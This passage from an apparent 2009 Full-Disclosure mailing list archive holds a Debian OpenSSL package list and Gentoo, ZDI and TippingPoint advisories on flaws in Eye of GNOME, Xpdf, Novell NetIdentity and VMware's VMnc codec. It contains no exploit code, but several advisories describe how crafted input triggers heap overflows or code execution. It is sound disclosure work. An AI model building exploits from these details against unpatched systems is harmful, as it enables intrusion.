  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_mips.deb
    Size/MD5 checksum:   729276 5146e1b6ed66259f6d58a13d2c6f1756
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_mips.udeb
    Size/MD5 checksum:   580260 36ffc36a4ff653edc1663fa613f4c796
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_mips.deb
    Size/MD5 checksum:   876020 028abdfb406889409ac716c36867fe23
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_mips.deb
    Size/MD5 checksum:  1352548 1ecd08359ecabd5b8e04da7f843b71bb
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_mips.deb
    Size/MD5 checksum:  2262834 54bb01125e110c2dc4c43c65ce9f9730

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_mipsel.deb
    Size/MD5 checksum:  1317298 157a1c31fd183e58f881d4a76797aabc
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_mipsel.deb
    Size/MD5 checksum:  1649922 3c21ccd74aa51157f04e85b5a42e23ef
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_mipsel.deb
    Size/MD5 checksum:  2255760 97ff8d94e59b42c1391d24703a872a48
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_mipsel.deb
    Size/MD5 checksum:   860956 fc5e5c18b3d2fc19755c4f869fb28371
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_mipsel.deb
    Size/MD5 checksum:   992952 579d75cba3835ddf575b9d505d74eba1
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_mipsel.udeb
    Size/MD5 checksum:   566446 21068e0699884d8fac38312acef33101
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_mipsel.deb
    Size/MD5 checksum:   719102 d8076095fe524cdcfcc52ecfe0469bb1

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_powerpc.udeb
    Size/MD5 checksum:   585362 40cb47951a679ef0ef8f6fccf6107fa2
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_powerpc.deb
    Size/MD5 checksum:  1002280 b221369b6a817d4170df25e94b9f8b97
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_powerpc.deb
    Size/MD5 checksum:   743544 545baa54e6f2f025742a8f7f6fb83367
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_powerpc.deb
    Size/MD5 checksum:   895728 2a136581adf8803d14b7d092dfef60e9
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_powerpc.deb
    Size/MD5 checksum:  1728854 d9766e89c445b8f1c8ff24c4ee7f6730
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_powerpc.deb
    Size/MD5 checksum:  1382178 dc4de4c5c9fca0a1e0f2c732fcda487a
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_powerpc.deb
    Size/MD5 checksum:  2211208 113ee7c6fcece0da9cf724f5e4b542de

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_s390.deb
    Size/MD5 checksum:  2194010 c5bd97f7ca31508bc3e8416b4cf1ce12
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_s390.deb
    Size/MD5 checksum:   794470 b3d6f8620488a4dc7c3b9205a2b5a934
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_s390.deb
    Size/MD5 checksum:  1317096 71fa068f773390139df1e17fbf81908e
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_s390.deb
    Size/MD5 checksum:  1014588 d0c11ebdba0262d79d04ba9b45128391
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_s390.udeb
    Size/MD5 checksum:   643094 1ebab208efb23650f158560367f3f857
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_s390.deb
    Size/MD5 checksum:  1633260 96963ea29fc7a80c9924a363910c352a
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_s390.deb
    Size/MD5 checksum:   951694 0c813312846afa88bcfc5323263d7722

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_sparc.deb
    Size/MD5 checksum:  1010692 3080e989aea2fac3f5edb8c518a8de28
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_sparc.deb
    Size/MD5 checksum:  3418006 16b39adf96a5b6e563c4d486620aab09
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_sparc.deb
    Size/MD5 checksum:  1799850 b66756fbeb175735a464ed19478953ac
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_sparc.udeb
    Size/MD5 checksum:   538982 8d4253bbea7d9209161a439b4b359e69
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_sparc.deb
    Size/MD5 checksum:  2126702 f2785d948367df2f7d9ba6f6e68c4c7a
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_sparc.deb
    Size/MD5 checksum:  2108296 0359985d4639e3f5d14365f996dee2af
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_sparc.deb
    Size/MD5 checksum:  4092066 b1d52efe93d8a4ccee071ff66fe90e22


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g.orig.tar.gz
    Size/MD5 checksum:  3354792 acf70a16359bf3658bdfb74bda1c4419
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1.diff.gz
    Size/MD5 checksum:    57021 f1d12733b036d0f1cccdc3f93d89ed91
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1.dsc
    Size/MD5 checksum:     1332 8b835fbf8b6b295e72c7fcbf389f9e18

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_alpha.deb
    Size/MD5 checksum:  2582366 8471b096868a90a22a369cce890b28b0
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_alpha.deb
    Size/MD5 checksum:  2813186 180f29fdea61ea7eb142005849ccdb56
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_alpha.udeb
    Size/MD5 checksum:   722068 055e6416bf54445d96b6b5e527229c7d
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_alpha.deb
    Size/MD5 checksum:  4368686 dd51e693fc2c3e896f458fa2d1c90f36
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_alpha.deb
    Size/MD5 checksum:  1028542 f3a6bd323d6f4bfb52503091b4d68a23

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_amd64.udeb
    Size/MD5 checksum:   638328 c18a8ef6c17956def6385cb212c6a972
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_amd64.deb
    Size/MD5 checksum:  1042826 b0fb4b7d109cd1e1995f030a32081ff7
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_amd64.deb
    Size/MD5 checksum:  2241536 ab23949eea6fe15092281dc62a3773eb
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_amd64.deb
    Size/MD5 checksum:   975238 5f10d70934dbdde8d1cd2aa57120c456
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_amd64.deb
    Size/MD5 checksum:  1627372 3d07a46e1452e94a956b73c3c4358b8d

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_arm.udeb
    Size/MD5 checksum:   535876 d7010e474ab2b4bd0a3e6803cf130fda
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_arm.deb
    Size/MD5 checksum:   843876 e5720bd90f00510a5a533e6aa1718d5b
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_arm.deb
    Size/MD5 checksum:  1028256 da9122aca3ab4d926799f0c0401a2ad1
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_arm.deb
    Size/MD5 checksum:  1490016 060dfa0ea2873ad98a3a7e357bfe6e93
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_arm.deb
    Size/MD5 checksum:  2086424 3107a73ef5086e1ccab33b22e08a623a

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_armel.deb
    Size/MD5 checksum:  2099428 1292d9455993b66544235a84d8e03efe
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_armel.deb
    Size/MD5 checksum:  1507624 39012734c1689fd4a09d946fc6a845f2
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_armel.udeb
    Size/MD5 checksum:   540674 6837d1e5756120c8eeb6351d3f277c33
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_armel.deb
    Size/MD5 checksum:  1030646 ee8a2b5f1a2ea1ef112509ccb65d1faa
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_armel.deb
    Size/MD5 checksum:   849982 48c2558d0fe7091fff368f9d743942c0

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_hppa.deb
    Size/MD5 checksum:  2268028 3c433efa492b9923a1b930ef4ab19841
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_hppa.deb
    Size/MD5 checksum:   968634 c63d67a2b38a30a73545f30e4aa24607
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_hppa.deb
    Size/MD5 checksum:  1046490 54d9745e32399860930ca04450b7b39a
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_hppa.udeb
    Size/MD5 checksum:   634550 094ba50a7302556bd0618569e17ff9c2
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_hppa.deb
    Size/MD5 checksum:  1527030 36c0f7798417675cd7981ddbc9705580

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_i386.deb
    Size/MD5 checksum:  2111598 912707c431b2dbf6d4e36c2a31b8b440
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_i386.deb
    Size/MD5 checksum:  5388510 42a7a8848e752dde862a20c08176d963
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_i386.deb
    Size/MD5 checksum:  2974220 5c87f867f977fd26d77ea7045338dc23
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_i386.udeb
    Size/MD5 checksum:   591648 48a7bf4304978c5b277d92f38d0e2379
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_i386.deb
    Size/MD5 checksum:  1036056 c35bc61f9c63d1e0733a927fd04c1d98

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_ia64.deb
    Size/MD5 checksum:  2658466 41eb62604fb87b7d3d01cda9ef982afd
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_ia64.udeb
    Size/MD5 checksum:   865308 70be412d7c2eb2738d480d9b7f6bef4d
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_ia64.deb
    Size/MD5 checksum:  1466596 8f2669464bfe853fbfc3daeb2337cd2f
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_ia64.deb
    Size/MD5 checksum:  1091224 6e8510b76c579797285c5709ca75736b
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_ia64.deb
    Size/MD5 checksum:  1282056 5ee5498cbfe1757eed843703519ecf92

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_mips.deb
    Size/MD5 checksum:  1012328 27ceb6f893297e785a9cee531a70e9f0
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_mips.deb
    Size/MD5 checksum:   899208 8529cdbb7f9b3385c7eced2af8045bd4
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_mips.udeb
    Size/MD5 checksum:   585154 42d41c65623af56f594b1a884d1937d2
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_mips.deb
    Size/MD5 checksum:  1622836 9f170a3d98747e9c8a274986be30eb95
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_mips.deb
    Size/MD5 checksum:  2300972 237c028b88950a4fdf8a7389d619c59c

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_mipsel.deb
    Size/MD5 checksum:   885106 4955b6547941d2572a70b7ae4b762a09
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_mipsel.deb
    Size/MD5 checksum:  1587126 924356c66d6e80ba5e99c0f378812160
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_mipsel.deb
    Size/MD5 checksum:  2294342 887a4b1d16d0a39ece803b96983f9168
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_mipsel.udeb
    Size/MD5 checksum:   572384 1d276af178f53a36c508f5a1788aed75
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_mipsel.deb
    Size/MD5 checksum:  1011614 fb95a352932fe84ed55771c2e799c85b

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_powerpc.deb
    Size/MD5 checksum:  1642718 05872aec4f0bf71f859784e67a8e7a39
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_powerpc.deb
    Size/MD5 checksum:  1034888 e9e792c1970a7cdf0cdf6c09c6bc9914
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_powerpc.udeb
    Size/MD5 checksum:   656116 171e30954c62906bc51b0e2de06b13c9
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_powerpc.deb
    Size/MD5 checksum:  1000200 4882382ffd9c3887ca60401f7be6240c
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_powerpc.deb
    Size/MD5 checksum:  2243790 a9bd06b8a3941a9c5b247c277ddfa5a1

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_s390.udeb
    Size/MD5 checksum:   692688 4b0f12a5f403142b2e5ea70503e420ee
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_s390.deb
    Size/MD5 checksum:  1025822 2b20597317d9c2f120db0743d8179f23
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_s390.deb
    Size/MD5 checksum:  1039274 47607ee00a14eb4f4cf358520ecaf9f3
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_s390.deb
    Size/MD5 checksum:  2229544 2d3adc7b210693e2e48c69c9619e04e4
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_s390.deb
    Size/MD5 checksum:  1603214 01ca45025dc74eff271bbef66c7fdc20

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8g-15+lenny1_sparc.deb
    Size/MD5 checksum:  2138478 d3731773f7b9162db9fc68af6823e656
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8g-15+lenny1_sparc.deb
    Size/MD5 checksum:  3870856 ae6cf4d3a846421b201572f1fd6e98c3
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8g-15+lenny1_sparc.deb
    Size/MD5 checksum:  2289748 949c202bd149f698e471349c7001ee76
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8g-15+lenny1_sparc.udeb
    Size/MD5 checksum:   580368 33c53d94bfef406982a440cf311fc33d
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8g-15+lenny1_sparc.deb
    Size/MD5 checksum:  1032562 a25905d632f249dcaf34f3567be1fb5e

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAknaLK8ACgkQXm3vHE4uylrcUgCgkycD+fL4pCFs/VsKrTURc3ph
3NIAn1ApLTF+AguODaqwNww0g93N6NCu
=EEBd
-----END PGP SIGNATURE-----



From py at gentoo.org  Mon Apr  6 22:56:18 2009
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Mon, 06 Apr 2009 23:56:18 +0200
Subject: [Full-disclosure] [ GLSA 200904-06 ] Eye of GNOME: Untrusted search
	path
Message-ID: <49DA7A82.3060503@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200904-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Eye of GNOME: Untrusted search path
      Date: April 06, 2009
      Bugs: #257002
        ID: 200904-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An untrusted search path vulnerability in the Eye of GNOME might result
in the execution of arbitrary code.

Background
==========

The Eye of GNOME is the official image viewer for the GNOME Desktop
environment.

Affected packages
=================

    -------------------------------------------------------------------
     Package        /   Vulnerable   /                      Unaffected
    -------------------------------------------------------------------
  1  media-gfx/eog      < 2.22.3-r3                       >= 2.22.3-r3

Description
===========

James Vega reported an untrusted search path vulnerability in the
GObject Python interpreter wrapper in the Eye of GNOME, a vulnerabiliy
related to CVE-2008-5983.

Impact
======

A local attacker could entice a user to run the Eye of GNOME from a
directory containing a specially crafted python module, resulting in
the execution of arbitrary code with the privileges of the user running
the application.

Workaround
==========

Do not run "eog" from untrusted working directories.

Resolution
==========

All Eye of GNOME users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-gfx/eog-2.22.3-r3"

References
==========

  [ 1 ] CVE-2008-5983
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5983
  [ 2 ] CVE-2008-5987
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5987

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 261 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090406/124cd4f7/attachment.bin 

From zdi-disclosures at tippingpoint.com  Mon Apr  6 21:51:00 2009
From: zdi-disclosures at tippingpoint.com (ZDI Disclosures)
Date: Mon, 6 Apr 2009 15:51:00 -0500
Subject: [Full-disclosure] ZDI-09-016: Novell Client/NetIdentity Agent
 Remote Arbitrary Pointer Dereference Code Execution Vulnerability
Message-ID: <C5FFD564.16129%zdi-disclosures@tippingpoint.com>

ZDI-09-016: Novell Client/NetIdentity Agent Remote Arbitrary Pointer
Dereference Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-016
April 6, 2009

-- Affected Vendors:
Novell

-- Affected Products:
Novell Netware

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Novell Netware. A valid IPC$ connection must
be established in order to exploit this vulnerability.

The specific flaw exists within xtagent.exe during the handling of RPC
messages over the XTIERRPCPIPE named pipe. Insufficient sanity checking
allows remote attackers to dereference an arbitrary pointer which can be
leveraged to execute code under the context of the system user.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More
details can be found at:

http://download.novell.com/Download?buildid=6ERQGPjRZ8o~

-- Disclosure Timeline:
2008-10-15 - Vulnerability reported to vendor
2009-04-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Ruben Santamarta

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/



From dvlabs at tippingpoint.com  Mon Apr  6 21:43:55 2009
From: dvlabs at tippingpoint.com (dvlabs)
Date: Mon, 6 Apr 2009 15:43:55 -0500
Subject: [Full-disclosure] TPTI-09-01: VMWare VMnc Codec Invalid RFB Message
	Type Heap Overflow
Message-ID: <C5FFD3BB.1611B%dvlabs@tippingpoint.com>

TPTI-09-01: VMWare VMnc Codec Invalid RFB Message Type Heap Overflow
Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-09-01
April 6, 2009

-- CVE ID:
CVE-2009-0909

-- Affected Vendors:
VMWare, Inc.

-- Affected Products:
VMWare, Inc. VMWare Player
VMWare, Inc. VMWare Workstation
VMWare, Inc. VMWare Server
VMWare, Inc. VMWare ACE

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of multiple VMWare products. User interaction
is required in that a user must visit a malicious web page or open a
malicious video file.

Upon installation VMWare Workstation, Server, Player, and ACE register
vmnc.dll as a video codec driver to handle compression and decompression
of the fourCC type 'VMnc'. This format is used primarily by Workstation
to capture remote framebuffer recordings of sessions within a virtual
machine. The resulting video is essentially a recorded session of VNC's
RFB protocol. In VMWare's implementation the stream consists solely of
FrameBufferUpdate messages (message type 0). However, if the message
type of one of these blocks is changed to any value greater than 0x03 a
size assumption is made which results in faulty math being applied to a
pointer used later in a memcpy.  This can be leveraged to execute
arbitrary code on the host system under the context of the current user.

-- Vendor Response:
VMWare, Inc. has issued an update to correct this vulnerability. More
details can be found at:

http://www.vmware.com/security/advisories/VMSA-2009-0005.html

-- Disclosure Timeline:
2009-02-13 - Vulnerability reported to vendor
2009-04-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Aaron Portnoy, TippingPoint DVLabs



From dvlabs at tippingpoint.com  Mon Apr  6 21:44:02 2009
From: dvlabs at tippingpoint.com (dvlabs)
Date: Mon, 6 Apr 2009 15:44:02 -0500
Subject: [Full-disclosure] TPTI-09-02: VMWare VMnc Codec Open-DML Standard
 Index dwSize Heap Overflow
Message-ID: <C5FFD3C2.16122%dvlabs@tippingpoint.com>

TPTI-09-02: VMWare VMnc Codec Open-DML Standard Index dwSize Heap Overflow
Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-09-02
April 6, 2009

-- CVE ID:
CVE-2009-0910

-- Affected Vendors:
VMWare, Inc.

-- Affected Products:
VMWare, Inc. VMWare Server
VMWare, Inc. VMWare ACE
VMWare, Inc. VMWare Player
VMWare, Inc. VMWare Workstation

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of multiple VMWare products. User interaction
is required in that a user must visit a malicious web page or open a
malicious video file.

Upon installation VMWare Workstation, Server, Player, and ACE register
vmnc.dll as a video codec driver to handle compression and decompression
of the fourCC type 'VMnc'. This format is used primarily by Workstation
to capture remote framebuffer recordings of sessions within a virtual
machine. The resulting video is stored within an AVI container file.
While playing back such files the function responsible for handling
ICM_DECOMPRESS driver messages implicitly trusts a size value while
decompressing a frame. Specifically, the dwSize element within an
Open-DML standard index RIFF chunk is used as an argument to a memcpy
into a static heap buffer. This can be leveraged to execute arbitrary
code on the host system under the context of the current user.

-- Vendor Response:
VMWare, Inc. has issued an update to correct this vulnerability. More
details can be found at:

http://www.vmware.com/security/advisories/VMSA-2009-0005.html

-- Disclosure Timeline:
2009-02-16 - Vulnerability reported to vendor
2009-04-06 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Aaron Portnoy, TippingPoint DVLabs



From rbu at gentoo.org  Tue Apr  7 11:18:22 2009
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 7 Apr 2009 12:18:22 +0200
Subject: [Full-disclosure] [ GLSA 200904-07 ] Xpdf: Untrusted search path
Message-ID: <200904071218.28380.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200904-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Xpdf: Untrusted search path
      Date: April 07, 2009
      Bugs: #242930
        ID: 200904-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in Xpdf might allow local attackers to execute
arbitrary code.

Background
==========

Xpdf is a PDF file viewer that runs under the X Window System.

Affected packages
=================

    -------------------------------------------------------------------
     Package        /  Vulnerable  /                        Unaffected
    -------------------------------------------------------------------
  1  app-text/xpdf      < 3.02-r2                           >= 3.02-r2

Description
===========

Erik Wallin reported that Gentoo's Xpdf attempts to read the "xpdfrc"
file from the current working directory if it cannot find a ".xpdfrc"
file in the user's home directory. This is caused by a missing
definition of the SYSTEM_XPDFRC macro when compiling a repackaged
version of Xpdf.

Impact
======

A local attacker could entice a user to run "xpdf" from a directory
containing a specially crafted "xpdfrc" file, resulting in the
execution of arbitrary code when attempting to, e.g., print a file.

Workaround
==========

Do not run Xpdf from untrusted working directories.

Resolution
==========

All Xpdf users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/xpdf-3.02-r2"

References
==========

  [ 1 ] CVE-2009-1144
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1144

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-07.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
